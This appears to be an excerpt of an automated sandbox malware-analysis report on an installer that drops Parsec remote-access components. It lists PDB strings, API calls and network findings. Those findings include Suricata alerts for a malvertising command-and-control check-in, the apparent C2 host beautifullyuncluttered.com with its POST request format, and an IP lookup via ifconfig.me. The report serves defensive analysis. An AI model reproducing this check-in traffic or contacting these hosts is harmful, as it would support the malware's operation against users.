Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 0000004A.00000003.2108779412.0000026240A6A000.00000004.00000020.00020000.00000000.sdmp, SETFD68.tmp.74.dr
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000039.00000002.2090721984.000001F9FBA9F000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000039.00000003.2066450318.000001F9FBAAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000001.00000002.2152942703.000000000018D000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdbGCTL source: is-NRIH7.tmp.1.dr
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000037.00000003.2032436401.000002B48D5F1000.00000004.00000020.00020000.00000000.sdmp, SETDCF0.tmp.53.dr, parsecvusba.sys.46.dr
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdb source: is-NRIH7.tmp.1.dr
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00418318 FindFirstFileW,FindFirstFileW,free, | 5_2_00418318
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 12_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 12_2_00405C49
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 12_2_00406873 FindFirstFileW,FindClose, | 12_2_00406873
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 12_2_0040290B FindFirstFileW, | 12_2_0040290B
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC03A89C FindFirstFileExW, | 40_2_00007FF7EC03A89C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 46_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 46_2_00405C49
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 46_2_00406873 FindFirstFileW,FindClose, | 46_2_00406873
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 46_2_0040290B FindFirstFileW, | 46_2_0040290B
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C58EE4 FindFirstFileExW, | 49_2_00007FF763C58EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BC85E4 FindFirstFileExW, | 52_2_00007FF694BC85E4
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 66_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 66_2_00405C49
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 66_2_00406873 FindFirstFileW,FindClose, | 66_2_00406873
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 66_2_0040290B FindFirstFileW, | 66_2_0040290B
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750F85E4 FindFirstFileExW, | 72_2_00007FF6750F85E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00419414 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, | 5_2_00419414

Networking

Source: Network traffic | Suricata IDS: 2051091 - Severity 1 - ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | IP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox View | IP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown | DNS query: name: ifconfig.me
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 34.160.111.145:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49735
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49751
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: ifconfig.me
Source: global traffic | HTTP traffic detected: POST /?CheckApp HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Charset=UTF-8; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Content-Length: 156; Host: beautifullyuncluttered.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: ifconfig.me
Source: global traffic | DNS traffic detected: DNS query: ifconfig.me
Source: global traffic | DNS traffic detected: DNS query: beautifullyuncluttered.com
Source: global traffic | DNS traffic detected: DNS query: builds.parsec.app
Source: unknown | HTTP traffic detected: POST /?CheckApp HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Charset=UTF-8; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Content-Length: 156; Host: beautifullyuncluttered.com
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309499408.0000019890894000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576173174.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: drvinst.exe, 00000037.00000003.2039083129.000002B48D596000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2038432096.000002B48D588000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2036630983.000002B48D59B000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000002.2039476468.000002B48D598000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309499408.0000019890894000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: parsec-vud.exe.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: parsec-windows.exe, 0000000C.00000000.1878859711.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002E.00000000.2008553821.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-vdd.exe, 00000042.00000000.2095284861.000000000040A000.00000008.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: pservice.exe, 00000028.00000003.3336997303.0000019890056000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.0000019890056000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575835781.0000019890056000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576074424.0000019890860000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
Source: pservice.exe, 00000028.00000002.3576040619.0000019890087000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575175842.000001988FFDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxL
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0
